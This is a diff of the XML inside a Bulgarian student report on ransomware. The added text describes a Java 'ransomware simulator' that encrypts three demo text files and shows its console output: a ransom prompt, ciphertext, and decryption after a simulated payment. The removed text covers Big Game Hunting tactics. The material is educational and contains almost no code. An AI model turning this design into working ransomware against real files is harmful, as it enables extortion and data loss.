+      <w:r>
+        <w:t>();</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="709"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Класът използва анотацията </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>@Slf4j</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> за логване. Има четири константи описващи какви са файловете, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">директорията им, паролата и солта. Създава се инстанция и на </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>TextEncryptor</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Частният метод </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>getTxtFiles</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> сложи да намери трите текстови файла в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>target_files</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> директорията. Методите </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>encryptAll</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>decryptAll</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> извикват този метод и за всеки файл правят прочит, криптират или декриптират като презаписват съдържанието на файловете*.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Big Game Hunting)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="708"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">За да оптимизират атаките си, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ransomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> операторите променят стратегията си. Те се отказват от метода „</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>spray</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>and</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>pray</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>“, при който зловредният софтуер се разпространява масово, без конкретен избор на жертва. Вместо това започват да таргетират конкретни организации и потребители</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, или известно още като</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Big Game Hunting.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Идеята е проста, вместо да се надяват някой да се хване и да получат малко сума откуп – стандартно са искали по 300</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> USD</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, компанията изложи на подобна атака стават жертва на откупи в суми достигащи десетки хиляди.  </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Такива жертви са </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>River Beach</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> и </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>TravelEx</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, заплатили съответно 600 000</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> USD</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> и </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">2.3 </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">млн. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>USD</w:t>
-      </w:r>
-      <w:r>
-        <w:t>. В двата примера атаката е една и също, изтегляне на неверифицирани файлове през</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> phishing</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> имейл.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="708"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">На фигура 7 е показан модела на атаката в </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">BGH. </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Започва през едно инфектирано устройство и се разпространява към всички възможни системи в мрежата. Процесът се повтаря, докато се заразяват възможно най-много системи. После се </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>деплойва</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ransomware-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ът</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> и се изисква откуп в биткойни.</w:t>
-      </w:r>
-      <w:r>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">*Освен този клас е създаден и </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>UI</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> клас, който няма да бъде разглеждан в демото.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="17" w:name="_Toc223385514"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Демонстрация на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ransomware</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="17"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="18" w:name="_Toc223385515"/>
+      <w:r>
+        <w:t>Съдържание на текстовите файлове преди криптирането:</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="18"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+        <w:keepNext/>
+        <w:rPr>
+          <w:lang w:val="bg-BG"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>This is my secret document with important information.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>11</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>document1.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:t>Another file with sensitive data that needs protection.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>12</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>: document2.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:t>Personal notes and passwords (just kidding, this is a demo).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>13</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>: notes.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:br w:type="page"/>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="19" w:name="_Toc223385516"/>
+      <w:r>
+        <w:t>Стартиране на демото:</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="19"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">22:47:58 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>INFO  =</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>=======================================</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">   RANSOMWARE SIMULATOR (Educational)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>========================================</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+        <w:keepNext/>
+        <w:rPr>
+          <w:lang w:val="bg-BG"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Press Enter to simulate attack...</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>14</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t>: Какво се визуализира първо на потребителя</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">22:51:03 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>WARN  SIMULATING</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> RANSOMWARE ATTACK...</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">22:51:03 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>INFO  [</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>ENCRYPTED] document1.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">22:51:03 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>INFO  [</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>ENCRYPTED] document2.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">22:51:03 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>INFO  [</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>ENCRYPTED] notes.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>22:51:03 ERROR ========================================</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>YOUR FILES HAVE BEEN ENCRYPTED!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Pay the ransom to recover your files.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+        <w:rPr>
+          <w:lang w:val="bg-BG"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>========================================</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Pay now? (yes/no): </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>15</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t>: Симулация на атаката. Файловете са криптирани. Потребителят трябва да потвърди, че е заплатил.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+        <w:keepNext/>
+        <w:rPr>
+          <w:lang w:val="bg-BG"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>2f0ba80edcf69430742e40ef970a177253163e83b1df0cf55b790bcd73f0959b1648c43caefd68b214ea1f6e16f50f80ef119ce88a1bf647ee8fd202ed0ce674b5be6ec4069d287f71e267c967d1000d</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>16</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>document1.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> след криптирането</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:t>8d4171026f8b8bfc0dbc4499590e8e70a52e62a622526462caa0c749f1dbd48d713c5dc3123751cf69b6d900e0f686da7a4ab9177a094bde6bdc22c8c4c930de5cd39fd133fa1d0c8b0186c8c7434d75</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>17</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>document2.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> след криптирането.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:t>2a26c3af01b7a5aad14a4c420b4ac559c120a940d49f048dd20290b018190722081e07e520108b1c635a94d054450b1243d7df61d0ced553cf9e9ca384b2da5962cc7792ba7fcab0ec25a15342ea3632</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>18</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: notes.txt </w:t>
+      </w:r>
+      <w:r>
+        <w:t>след криптирането.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="0E2841" w:themeColor="text2"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="20" w:name="_Toc223385517"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Жертвата е заплатила откупа:</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="20"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Pay now? (yes/no): yes</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">22:59:07 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>INFO  Payment</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> confirmed. Decrypting files...</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">22:59:07 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>INFO  [</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>DECRYPTED] document1.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">22:59:07 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>INFO  [</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>DECRYPTED] document2.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">22:59:07 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>INFO  [</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>DECRYPTED] notes.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+        <w:rPr>
+          <w:lang w:val="bg-BG"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">22:59:07 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>INFO  Decryption</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> complete!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>19</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t>: Файловете са възстановени</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+        <w:keepNext/>
+        <w:rPr>
+          <w:lang w:val="bg-BG"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>This is my secret document with important information.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>20</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> document1.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> след декриптирането.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:t>Another file with sensitive data that needs protection.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>21</w:t>
+      </w:r>
+      <w:r>
